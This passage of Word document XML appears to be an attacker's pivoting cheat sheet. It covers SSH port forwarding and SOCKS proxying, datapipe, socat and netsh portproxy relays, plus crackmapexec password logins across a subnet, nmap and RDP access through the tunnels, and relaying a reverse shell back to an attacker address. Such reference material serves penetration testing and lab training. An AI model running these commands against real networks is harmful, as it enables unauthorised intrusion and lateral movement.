        <w:t>on your attacker box</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> tunnels </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> the SSH server to an internal target (you initiate SSH):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72050D7A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>ssh -L 4445:172.16.20.20:445 user@10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E2E832" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#   attacker 127.0.0.1:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>4445  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;  172.16.20.20</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2AF24" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 127.0.0.1:4445 -u admin -p 'Passw0rd!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E35BDE9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">ssh -L 8080:172.16.20.20:80 -L 33389:172.16.20.20:3389 user@10.10.10.10   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># multiple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC37893" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dynamic forward -D (SOCKS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — one port proxying to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> host/port the pivot reaches; pair with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF56C95" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>ssh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>fN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -D 1080 user@10.10.10.10             </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># background SOCKS on 127.0.0.1:1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3153470D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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -p 445,3389,80 172.16.20.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D99D08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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.0/24 -u admin -p 'Passw0rd!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A178B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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /v:172.16.20.20 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>u:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /p:'Passw0rd!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E160EF4" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote forward -R</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — a port </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on the pivot</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> tunnels back to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (use when the pivot can reach you but not vice-versa — e.g. to catch an internal reverse shell):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F489037" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">ssh -R 4444:127.0.0.1:4444 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">user@10.10.10.10  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> internal host -&gt; PIVOT:4444 -&gt; attacker:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD16545" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">ssh -R 1080 user@10.10.10.10                  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># reverse SOCKS on the pivot (newer OpenSSH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6526F95B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flags:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-N</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (no shell), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (background), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-C</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (compress), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-J user@PIVOT1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ProxyJump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> for chaining, §9).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23390A7A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="6FBA1FC3">
          <v:rect id="_x0000_i1193" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E53ABCE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 xml:space="preserve">6. Port Forwarding — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Datapipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>portproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AF2F499" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Datapipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — tiny single-purpose TCP forwarder (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>listen_host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>listen_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dest_host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dest_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659E6799" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># build (raise MAXCLIENTS if needed):  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>datapipe.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>datapipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08F94681" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>datapipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 0.0.0.0 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>445  172.16.20.20</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 445      </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># relay pivot :445 -&gt; internal :445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E12883F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>datapipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 0.0.0.0 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>135  172.16.20.20</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0801BA5F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>datapipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 0.0.0.0 4444 10.10.14.2   4444     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># relay a reverse-shell port back to you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45578E0D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> target the PIVOT's forwarded port from your box:  set RHOSTS 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF163C3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — full forwarder (TCP </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>and UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298CFDEB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> TCP-LISTEN:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>80,fork</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> TCP:172.16.20.20:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F5DE30" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> UDP-RECVFROM:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>161,fork</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> UDP-SENDTO:172.16.20.20:161   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1359ABA9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> UDP-RECVFROM:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>53,fork</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  UDP-SENDTO:172.16.20.20:53    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721B2C29" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>portproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — built-in (needs local admin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A22D3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> interface </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>portproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> add    v4tov4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>listenport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">=8888 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>connectaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">=172.16.20.20 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>connectport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>=80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4396AAEE" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> interface </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>portproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> show   v4tov4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062841BC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> interface </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>portproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> delete v4tov4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>listenport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>=8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E7188" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> reach it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>at  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>pivot-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>8888  -&gt;  172.16.20.20</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
